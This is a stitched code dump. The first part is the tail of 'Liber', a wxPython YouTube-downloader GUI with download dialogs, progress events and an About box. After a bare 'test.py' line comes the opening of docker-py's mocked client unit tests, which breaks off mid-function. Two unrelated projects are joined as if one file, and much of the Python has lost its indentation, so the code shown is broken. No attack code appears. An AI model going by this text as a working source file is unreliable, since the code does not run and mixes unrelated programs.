hSizer2 = wx.BoxSizer(wx.HORIZONTAL)
hSizer2.Add(stDownloadAs)
hSizer2.Add(self.radioAudio)
hSizer2.Add(self.radioVideo)
vWrapper = wx.BoxSizer(wx.VERTICAL)
vWrapper.Add((-1, 5))
vWrapper.Add(hSizer2)
hSizer.Add(vWrapper)
self.mainSizer.Add(hSizer)
self.mainSizer.Add(self.progressBar)
self.mainSizervWrapper = wx.BoxSizer(wx.HORIZONTAL)
self.mainSizervWrapper.Add(self.mainSizer)
self.mainSizervWrapper.Add((20, -1))
self.SetSizer(self.mainSizervWrapper)
self.SetSize(TILE_SIZE)
self.logger.info("Construction finished.")
def sizeElementsInAColumn(self, objects, object_sizes, line_size, vSizer, padding=(-1, 7)):
"""
This is a recursive function that will take in the object_sizes and determine based on that how many
objects it can fit in the space of line_size. These objects are added to a horizontal box sizer and that box
sizer is then added to vSizer. Then, this function will call itself once again, so that it will be able to
add multiple rows of items with different amounts of objects to vSizer. vSizer is then returned when the
recursion has finished.
:param objects: Objects to add to vSizer
:param object_sizes: The sizes of the objects (width)
:param line_size: The amount of space the objects have to fit in/ their constraint (width)
:param vSizer: The vertical sizer that the objects and horizontal sizers are added to.
:param padding: Extra padding to add between each element in the vSizer (vertical padding)
:return: the finished vSizer with all the objects in it.
"""
if len(objects) == 0: # terminating parameter
return vSizer
else:
# starts by trying to add as many objects as it can to the horizontal sizer, then works its way back,
# removing one object at a time
for x in range(len(objects) + 1)[::-1]:
if sum(object_sizes[:x]) + 10 < line_size:
hSizer = wx.BoxSizer(wx.HORIZONTAL)
for y in objects[:x]:
hSizer.Add(y)
hSizer.Add((5, -1))
vSizer.Add(hSizer)
vSizer.Add(padding)
vSizer.Layout()
# start recursion
vSizer = self.sizeElementsInAColumn(objects[x:], object_sizes[x:], line_size, vSizer)
return vSizer
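    # Worked sketch of the packing described above (illustrative numbers only, not
    # taken from the original code): with object_sizes = [60, 40, 30, 20] and
    # line_size = 120, the first call finds that objects[:2] fit (60 + 40 + 10 < 120)
    # and adds them as one horizontal row, then recurses on the remaining two objects
    # (30 + 20 + 10 < 120), which become a second row. The returned vSizer therefore
    # holds two hSizer rows plus the padding spacers.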
def updateDownloadLabel(self, label=None):
"""
Changes self.btDownload's label either the given string or to the current download path
:param label: String to write to btDownload's label
"""
if label is None:
label = "Download to {}".format(self.downloadPath if self.downloadPath != Liber.ITUNES else "iTunes")
self.logger.debug("Updating the download button's label to: {}".format(label))
self.btDownload.SetLabel(label)
self.btDownload.SetSize(self.btDownload.GetEffectiveMinSize())
self.mainSizer.Layout()
def worker(self, function, args, kwargs):
"""
Opens up a new thread, which opens up another process to perform a certain task
:param function: function to run
:param args: args to be passed to function
:param kwargs: kwargs to be passed to function
"""
self.logger.info("Worker process started. Function: %s" % function)
thread = threading.Thread(target=function, args=args, kwargs=kwargs)
thread.start()
def onReset(self, event):
"""
Resets the progress bar and download button to their default values.
"""
self.logger.info("EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON detected. Resetting values.")
self.updateDownloadLabel()
self.btDownload.Enable()
self.progressBar.SetValue(0)
def resetPBandDBThread(self):
"""
Thread that waits a certain amount of seconds and then posts a EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON event
"""
sleep_time = 6
self.logger.info("Reset progressbar and download button thread started. Sleeping {} seconds".format(sleep_time))
wx.Sleep(sleep_time)
self.logger.info("{} seconds up. Posting EVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON".format(sleep_time))
        evt = ResetProgressBarAndDownloadButtonEvent(myEVT_RESET_PROGRESSBAR_AND_DOWNLOADBUTTON, -1)
wx.PostEvent(self, evt)
def onChangeAA(self, event):
"""
Called when a change aa event is called. Gets the value from the event and changes the album artwork data
to that value
"""
self.logger.info("EVT_CHANGE_AA event detected. Changing album artwork.")
self.artworkImage.LoadStream(StringIO.StringIO(event.GetValue()))
self.artworkImage.Rescale(*ALBUM_ART_SIZE)
self.artwork.SetBitmap(wx.BitmapFromImage(self.artworkImage))
self.Refresh()
def changeAAThread(self, image):
"""
Pulls album art image. Change aa event is posted to tell the parent to take the given data and apply it to
the album artwork image. The source of the image (url/file path) is stored.
:param image: can either be a url or a file path to a jpg/png.
"""
self.logger.info("Changing album art image to: '%s'" % image)
try:
self.artworkSource = image
artworkData = self.YTSong.get_artwork(image)
            self.logger.info("Obtaining album art was a success. Posting event")
evt = ChangeAAEvent(myEVT_CHANGE_AA, -1, artworkData)
wx.PostEvent(self, evt)
except:
self.logger.warning("Failure to obtain image")
self.artworkSource = None
            bitmap = wx.EmptyBitmap(ALBUM_ART_SIZE[0], ALBUM_ART_SIZE[1])
memDC = wx.MemoryDC()
memDC.SelectObject(bitmap)
            memDC.DrawText("F", (ALBUM_ART_SIZE[0] - memDC.GetTextExtent("F")[0]) / 2,
                           (ALBUM_ART_SIZE[1] - memDC.GetTextExtent("F")[1]) / 2)
# take the selected bitmap out of memory
memDC.SelectObject(wx.NullBitmap)
image = wx.ImageFromBitmap(bitmap)
data = image.GetAlphaData()
evt = ChangeAAEvent(myEVT_CHANGE_AA, -1, data)
wx.PostEvent(self, evt)
def onChooseAAPath(self, event):
"""
Opens up a dialog that asks a user for a path to a jpg or png image, then tells a worker thread to change
the album artwork to the user's input
"""
self.logger.info("Choose album artwork (path) event triggered. Opening a dialog to get user input")
openFileDialog = wx.FileDialog(self, "Open a jpg/png image for the album artwork.", "", "",
"JPG files (*.jpg)|*.jpg|PNG files (*.png)|*.png",
wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if openFileDialog.ShowModal() != wx.ID_CANCEL:
self.worker(self.changeAAThread, (openFileDialog.GetPath(),), {})
self.logger.info("Album artwork location changed. New album artwork path is: {}".format(
openFileDialog.GetPath()))
else:
self.logger.info("Choose album artwork (path) event canceled. ")
def onChooseAAURL(self, event):
"""
Opens up a dialog that asks a user for a url to a jpg or png image, then tells a worker thread to change
the album artwork to the user's input
"""
self.logger.info("Choose album artwork (URL) event triggered. Opening a dialog to get user input")
textEntryDialog = wx.TextEntryDialog(self, "Please enter a URL to a jpg or png image for the album artwork.",
caption="Enter URL")
if textEntryDialog.ShowModal() != wx.ID_CANCEL:
self.worker(self.changeAAThread, (textEntryDialog.GetValue(),), {})
self.logger.info("Album artwork location changed. New album artwork location is: {}".format(
textEntryDialog.GetValue()))
else:
self.logger.info("Choose album artwork (URL) event canceled.")
def onChooseAAThumb(self, event):
"""
Changes the album artwork to that of the video's thumbnail.
"""
self.logger.info("Choose album artwork (thumb) event triggered. Changing album artwork to the thumbnail")
self.worker(self.changeAAThread, (self.YTSong.thumb, ), {})
def onChooseDownloadPath(self, event):
"""
Opens up a dialog allowing the user to choose their own download path.
"""
self.logger.info("Choose download path event triggered. Opening a dialog for user input now.")
dirDialog = wx.DirDialog(self, "Please choose a folder in which to download the file into.")
if dirDialog.ShowModal() != wx.ID_CANCEL:
self.downloadPath = dirDialog.GetPath()
self.tempDownloadPath = self.downloadPath
self.radioDownload.SetValue(False)
self.radioIT.SetValue(False)
self.logger.info("Download path changed. New download path is: {} and new temp download path is: {}".format(
self.downloadPath, self.tempDownloadPath))
self.updateDownloadLabel()
else:
self.logger.info("Choose download path event canceled.")
def onChangeDownLociTunes(self, event):
"""
Changes self.downloadPath to Liber.ITUNES and changes self.tempDownloadPath to Liber.ITUNES_TEMP
"""
self.logger.info("Download to iTunes radio button triggered. Changing download path to Liber.ITUNES and "
"changing temp download path to Liber.ITUNES_TEMP")
self.downloadPath = Liber.ITUNES
self.tempDownloadPath = Liber.ITUNES_TEMP
self.updateDownloadLabel()
def onChangeDownLocDownloads(self, event):
"""
Changes self.downloadPath and self.tempDownloadPath to Liber.DOWNLOADS
"""
self.logger.info("Download to downloads radio button triggered. Changing download path to Liber.DOWNLOADS "
"and changing temp download path to Liber.DOWNLOADS")
self.downloadPath = Liber.DOWNLOADS
self.tempDownloadPath = self.downloadPath
self.updateDownloadLabel()
def onChangeDownloadType(self, event):
"""
Logs the event of the user changing the download type and updates self.downloadType based on the values of
self.radioAudio and self.radioVideo. Also disable all elements of the GUI that cannot be used with the
associated download type.
:return: None
"""
if self.radioAudio.GetValue() is True:
self.downloadType = Liber.ID_AUDIO
for x, y in self.metadata.items():
y[1].Enable()
self.btAAPath.Enable()
self.btAAThumb.Enable()
self.btAAURL.Enable()
elif self.radioVideo.GetValue() is True:
self.downloadType = Liber.ID_VIDEO
for x, y in self.metadata.items():
if x != 'title':
y[1].Disable()
self.btAAPath.Disable()
self.btAAThumb.Disable()
self.btAAURL.Disable()
self.logger.info("Download type has been changed to {} (Liber.ID_AUDIO: {}, Liber.ID_VIDEO: {})".format(
self.downloadType, self.downloadType == Liber.ID_AUDIO, self.downloadType == Liber.ID_VIDEO))
def onUpdatePB(self, event):
"""
        Updates the progress bar using the ratio (0-1) found in event.GetValue(). Since an audio download reports
        two separate ratios (first the download itself, then the metadata step), the progress bar is split in half.
"""
if self.downloadType == Liber.ID_AUDIO:
if self.progressBar.GetValue() >= 50:
value = 50 + event.GetValue() * 50
else:
value = event.GetValue() * 50
elif self.downloadType == Liber.ID_VIDEO:
value = event.GetValue() * 100
else:
value = 100
self.logger.warning("Invalid download type. Cannot update progress bar! Setting value to 100.")
self.progressBar.SetValue(value)
if self.progressBar.GetValue() >= 100:
self.updateDownloadLabel("Finished")
self.enableDownloads = True
self.worker(self.resetPBandDBThread, (), {})
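    # Worked example of the split above (assuming, as the math implies, that callback
    # ratios arrive in the 0-1 range): for an audio download, a download ratio of 0.6
    # maps to 0.6 * 50 = 30 while the bar is still below 50; once the metadata phase
    # starts (bar >= 50), a metadata ratio of 0.5 maps to 50 + 0.5 * 50 = 75. A video
    # download uses the whole bar, so a ratio of 0.75 maps straight to 75.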
def callbackDownload(self, total, recvd, ratio, rate, eta):
"""
        Changes the progress bar based on the download ratio. To do this an EVT_UPDATE_PROGRESSBAR event is posted
:param total: Total download size (bytes)
:param recvd: Total amount downloaded (bytes)
:param ratio: Percentage downloaded
:param rate: Rate of download
        :param eta: Estimated time remaining until the download completes
"""
evt = UpdateProgressBarEvent(myEVT_UPDATE_PROGRESSBAR, -1, ratio)
wx.PostEvent(self, evt)
def callbackMetadata(self, ratio):
"""
        While metadata is being added in the Liber module, this function is called to show progress.
:param ratio: 0<x<1, percentage of completion for adding the metadata
"""
evt = UpdateProgressBarEvent(myEVT_UPDATE_PROGRESSBAR, -1, ratio)
wx.PostEvent(self, evt)
def download(self, evt):
"""
Calls the paired YTSong method download, using self.callback to change the progress bar and threading.
"""
self.logger.info("Download method invoked. Downloading now.")
if self.downloadPath is not None and self.tempDownloadPath is not None and self.enableDownloads is True:
self.btDownload.Disable()
self.updateDownloadLabel("Downloading...")
self.btDownload.Fit()
self.enableDownloads = False
self.progressBar.SetValue(0)
metadata = {}
for x, y in Liber.METADATA.items():
metadata[x] = self.metadata[x][1].GetValue()
self.worker(self.YTSong.download, (self.downloadPath, self.tempDownloadPath),
{"downloadType": self.downloadType, "metadata": metadata, "album_artwork": self.artworkSource,
"callbackDown": self.callbackDownload, "callbackMetadata": self.callbackMetadata})
elif self.enableDownloads is False:
self.logger.info("Unable to download: it has been disabled.")
else:
self.logger.error("Unable to download: None of the radio buttons have been pressed- no "
"download location set!")
class MainFrame(wx.Frame):
"""
This is the GUI structure that holds all the tiles in a scrollable window. Contains a download-all button, an
add new tile button, and the about and help menus.
"""
def __init__(self, parent, *args, **kwargs):
"""
Create the frame and ask for the first URL.
"""
self.logger = logger.getChild("MainFrame")
self.logger.info("Constructing")
super(MainFrame, self).__init__(parent, *args, **kwargs)
self.SetSize(TILE_SIZE)
self.tiles = []
# add an icon and a title
if platform.system() == 'Windows':
            self.SetIcon(wx.Icon(os.getcwd()+'\\docs\\256x256.png',
wx.BITMAP_TYPE_ANY))
else:
self.SetIcon(wx.Icon(os.getcwd()+'/docs/256x256.png',
wx.BITMAP_TYPE_ANY))
self.SetTitle("Liber")
menuBar = wx.MenuBar()
fileMenu = wx.Menu()
fileAbout = fileMenu.Append(wx.ID_ABOUT, 'About', 'Show information about this application')
self.Bind(wx.EVT_MENU, self.onAbout, fileAbout)
fileExit = fileMenu.Append(wx.ID_EXIT, 'Exit', 'Exit application')
self.Bind(wx.EVT_MENU, self.onClose, fileExit)
menuBar.Append(fileMenu, '&File')
self.SetMenuBar(menuBar)
self.scrollPanel = scrolled.ScrolledPanel(self, size=(TILE_SIZE[0] + 50, TILE_SIZE[1]))
self.scrollPanelvSizer = wx.BoxSizer(wx.VERTICAL)
self.scrollPanel.SetSizer(self.scrollPanelvSizer)
self.scrollPanel.SetAutoLayout(1)
self.scrollPanel.SetupScrolling(50, 50, 0)
self.controlPanel = wx.Panel(self, size=(TILE_SIZE[0], -1))
self.controlPanel.SetBackgroundColour("#ff3333")
self.btDownloadAll = wx.Button(self.controlPanel, wx.ID_ANY, "Download all")
self.Bind(wx.EVT_BUTTON, self.onDownloadAll, self.btDownloadAll)
self.btAddTile = wx.Button(self.controlPanel, wx.ID_ANY, "Add video")
self.Bind(wx.EVT_BUTTON, self.onAddTile, self.btAddTile)
self.btExit = wx.Button(self.controlPanel, wx.ID_ANY, "Exit")
self.Bind(wx.EVT_BUTTON, self.onClose, self.btExit)
self.Bind(wx.EVT_CLOSE, self.onClose)
vSizer = self.getControlPanelSizer()
self.controlPanel.SetSizerAndFit(vSizer)
self.mainSizer = wx.BoxSizer(wx.HORIZONTAL)
self.mainSizer.Add(self.controlPanel, flag=wx.EXPAND | wx.ALIGN_LEFT)
self.mainSizer.Add(self.scrollPanel, flag=wx.EXPAND)
self.SetSizer(self.mainSizer)
self.onAddTile(None)
self.Fit()
self.Show()
def onAbout(self, event):
"""
Displays an about dialog
"""
        description = """Liber is an application that is meant to help others download YouTube videos
        with ease of use, for it puts all the steps into one location (such as: adding information to the audio,
        adding album artwork to the audio, adding the audio/video into iTunes, etc.). That being said, Liber is
        intended for downloading NON-COPYRIGHTED music/content only, as downloading copyrighted material is illegal.
        Also, downloading YouTube videos rather than streaming them is a violation of YouTube's end user agreement,
        so use at your own risk (see http://www.pcadvisor.co.uk/how-to/internet/is-it-legal-download-youtube-videos-3420353/
        for more info). If you would like to report a bug or contribute to this open-source project, see:
        https://github.com/DevelopForLizardz/Liber"""
        licence = """Liber is free software and can be used, modified and distributed, but only under the terms
        and conditions of the MIT License (which can be found here: https://opensource.org/licenses/MIT). Liber
        is also distributed without any warranty."""
info = wx.AboutDialogInfo()
info.SetIcon(wx.Icon(os.path.dirname(__file__)+'/docs/512x512.png', wx.BITMAP_TYPE_ANY))
info.SetName("Liber")
info.SetVersion(str(__version__))
info.SetDescription(description)
info.SetCopyright('(C) 2015 Ryan Drew')
info.SetLicense(licence)
info.AddDeveloper("Ryan Drew")
info.AddArtist("Grace Drew")
wx.AboutBox(info)
def getControlPanelSizer(self):
"""
        Returns a vertical box sizer that contains the elements for the control panel area on the left side.
This allows for that area to be resized easily when the size of the window changes
"""
controlEndPadding = (-1, (self.GetSize()[1] - (10 + self.btDownloadAll.GetSize()[1] +
self.btAddTile.GetSize()[1] + self.btExit.GetSize()[1])) / 4.0)
hSizer = wx.BoxSizer(wx.VERTICAL)
hSizer.Add(controlEndPadding)
hSizer.Add(self.btDownloadAll, flag=wx.CENTER)
hSizer.Add(controlEndPadding)
hSizer.Add(self.btAddTile, flag=wx.CENTER)
hSizer.Add(controlEndPadding)
hSizer.Add(self.btExit, flag=wx.CENTER)
hSizer.Add(controlEndPadding)
return hSizer
def onDownloadAll(self, event):
"""
Sends a message to each tile telling them to start downloading.
"""
for x in self.tiles:
x.download(None)
def onAddTile(self, event):
"""
Obtains a YouTube URL from the user and creates a tile for it, adding the tile into self.tiles. If obtaining
the video fails, an error message dialog pops up, telling the user of the error, where they can report the
error, and whether they want to continue using the program or quit.
"""
textEntryDialog = wx.TextEntryDialog(self, "Please enter the URL for a YouTube video you wish to download",
"Enter a YouTube URL",
defaultValue="https://www.youtube.com/watch?v=dQw4w9WgXcQ")
if textEntryDialog.ShowModal() != wx.ID_CANCEL:
try:
self.tiles.append(Tile(textEntryDialog.GetValue(), self.scrollPanel, parentLogger=self.logger))
self.SetMaxSize((-1, -1))
if len(self.tiles) > 1:
self.scrollPanelvSizer.Add((-1, 10))
self.scrollPanelvSizer.Add((wx.StaticLine(self.scrollPanel, size=(TILE_SIZE[0], -1))))
self.scrollPanelvSizer.Add((-1, 10))
self.scrollPanelvSizer.Add(self.tiles[len(self.tiles) - 1])
self.scrollPanel.SetSizer(self.scrollPanelvSizer)
w, h = self.scrollPanelvSizer.GetMinSize()
self.scrollPanel.SetVirtualSize((w, h))
self.scrollPanel.AdjustScrollbars()
if self.GetSize()[1] < wx.DisplaySize()[1] / 2.0:
self.SetSize((TILE_SIZE[0]+self.controlPanel.GetSize()[0]+10, len(self.tiles) * (TILE_SIZE[1]+20)))
self.controlPanel.SetSizerAndFit(self.getControlPanelSizer())
self.SetMinSize(self.GetSize())
self.SetMaxSize(self.GetSize())
else:
self.SetMaxSize(self.GetSize())
self.scrollPanel.Scroll(0, self.GetSize()[1])
self.Refresh()
            except Exception as e:
                self.logger.error("An error occurred while trying to create a tile", exc_info=True)
                messageDialog = wx.MessageDialog(self,
                                                 "An error occurred while trying to fetch your video: {}. Sorry "
"about that. To report this issue, visit: {}".format(
e, "https://github.com/DevelopForLizardz/Liber"),
style=wx.CANCEL | wx.ICON_ERROR)
messageDialog.ShowModal()
elif len(self.tiles) == 0:
            self.logger.info("User pressed cancel on the first 'add video' prompt. Destroying.")
self.Destroy()
self.DestroyChildren()
sys.exit(0)
def onClose(self, event):
"""
        Pops up a dialog asking the user whether they are sure they want to quit, and exits the program if they
        confirm.
"""
self.logger.info("Close event triggered. Asking for confirmation from user.")
quitDialog = wx.MessageDialog(self, "Are you sure you want to quit?", "Exit",
style=wx.OK | wx.CANCEL | wx.ICON_HAND)
if quitDialog.ShowModal() == wx.ID_OK:
self.logger.info("Destroying")
self.Destroy()
self.DestroyChildren()
sys.exit(0)
else:
self.logger.info("Close event canceled")
if __name__ == '__main__':
app = wx.App()
frame = MainFrame(None)
frame.Show()
frame.Center()
app.MainLoop()
test.py
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import gzip
import io
import json
import os
import re
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import time
import random
import docker
import requests
import six
from . import base
from . import fake_api
from .helpers import make_tree
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
return res
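# Minimal illustrative sketch (not used by the tests below): response() builds a
# requests.Response whose status code and JSON body the client code under test
# will see. The status code and payload here are made-up example values.
def _example_response_usage():
    ok = response(status_code=200, content={'Id': 'abc123'})
    assert ok.status_code == 200
    assert json.loads(ok.content.decode('ascii')) == {'Id': 'abc123'}
    return ok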
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_inspect_container_tty(self, container):
return fake_inspect_container(self, container, tty=True)
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
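# Illustrative sketch: fake_request dispatches through fake_resp() and, being a
# Mock, records every call, so a test can issue a request and then assert on the
# exact method, URL and kwargs. This assumes the 'version' endpoint is registered
# in fake_api.fake_responses, as the version tests below rely on.
def _example_fake_request_usage():
    fake_request('GET', url_prefix + 'version', timeout=DEFAULT_TIMEOUT_SECONDS)
    fake_request.assert_called_with(
        'GET', url_prefix + 'version', timeout=DEFAULT_TIMEOUT_SECONDS
    )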
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
url_base = 'http+docker://localunixsocket/'
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
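# For example, if DEFAULT_DOCKER_API_VERSION were '1.19' (illustrative value only),
# url_prefix would be 'http+docker://localunixsocket/v1.19/' and a container start
# request would go to url_prefix + 'containers/<id>/start'.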
class Cleanup(object):
if sys.version_info < (2, 7):
# Provide a basic implementation of addCleanup for Python < 2.7
def __init__(self, *args, **kwargs):
super(Cleanup, self).__init__(*args, **kwargs)
self._cleanups = []
def tearDown(self):
super(Cleanup, self).tearDown()
ok = True
while self._cleanups:
fn, args, kwargs = self._cleanups.pop(-1)
try:
fn(*args, **kwargs)
except KeyboardInterrupt:
raise
except:
ok = False
if not ok:
raise
def addCleanup(self, function, *args, **kwargs):
self._cleanups.append((function, args, kwargs))
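# Illustrative sketch: with the backport above, a test on Python 2.6 can register
# teardown callbacks exactly as on 2.7+, e.g.
#
#     def test_something(self):
#         tmp = tempfile.mkdtemp()
#         self.addCleanup(shutil.rmtree, tmp)
#
# (tempfile and shutil are already imported at the top of this module; the test
# name is a hypothetical example.)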
@mock.patch.multiple('docker.Client', get=fake_get, post=fake_post,
put=fake_put, delete=fake_delete)
class DockerClientTest(Cleanup, base.BaseTestCase):
def setUp(self):
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
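    # assertIn does not exist on Python 2.6's unittest.TestCase, so the shim below
    # falls back to a plain membership assertTrue there and defers to the parent
    # class everywhere else.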
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
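    # Illustrative note: base_create_payload() mirrors the default JSON body sent by
    # create_container() (compare test_create_container below); the HostConfig tests
    # extend it, e.g.
    #
    #     expected = self.base_create_payload()
    #     expected['HostConfig'] = self.client.create_host_config()
    #     expected['HostConfig']['Privileged'] = True
    #
    # which is the pattern those tests assert against.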
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
docker.Client(version=1.12)
self.assertEqual(
str(excinfo.value),
'Version parameter must be a string or None. Found float'
)
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/somename/world')
)
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'hello/somename/world/someothername')
)
url = self.client._url('/hello/{0}/world', '/some?name')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/%2Fsome%3Fname/world')
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
self.assertEqual(url, '{0}{1}'.format(url_prefix, 'simple'))
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
self.assertEqual(
url, '{0}{1}'.format(url_base, 'hello/somename/world')
)
#########################
# INFORMATION TESTS #
#########################
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_viz(self):
        # Requesting viz output is unsupported, so the client must raise.
        with pytest.raises(Exception):
            self.client.images('busybox', viz=True)
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
###################
# LISTING TESTS #
###################
def test_images(self):
self.client.images(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_quiet(self):
self.client.images(all=True, quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_ids(self):
self.client.images(quiet=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 0},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_filters(self):
self.client.images(filters={'dangling': True})
fake_request.assert_called_with(
'GET',
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 0,
'filters': '{"dangling": ["true"]}'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_containers(self):
self.client.containers(all=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/json',
params={
'all': 1,
'since': None,
'size': 0,
'limit': -1,
'trunc_cmd': 0,
'before': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
@base.requires_api_version('1.21')
def test_list_networks(self):
networks = [
{
"name": "none",
"id": "8e4e55c6863ef424",
"type": "null",
"endpoints": []
},
{
"name": "host",
"id": "062b6d9ea7913fde",
"type": "host",
"endpoints": []
},
]
get = mock.Mock(return_value=response(
status_code=200, content=json.dumps(networks).encode('utf-8')))
with mock.patch('docker.Client.get', get):
self.assertEqual(self.client.networks(), networks)
self.assertEqual(get.call_args[0][0], url_prefix + 'networks')
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertFalse(filters)
self.client.networks(names=['foo'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'name': ['foo']})
self.client.networks(ids=['123'])
filters = json.loads(get.call_args[1]['params']['filters'])
self.assertEqual(filters, {'id': ['123']})
#####################
# CONTAINER TESTS #
#####################
def test_create_container(self):
self.client.create_container('busybox', 'true')
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_binds(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=[mount_dest])
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volume_string(self):
mount_dest = '/mnt'
self.client.create_container('busybox', ['ls', mount_dest],
volumes=mount_dest)
args = fake_request.call_args
self.assertEqual(args[0][1],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_ports(self):
self.client.create_container('busybox', 'ls',
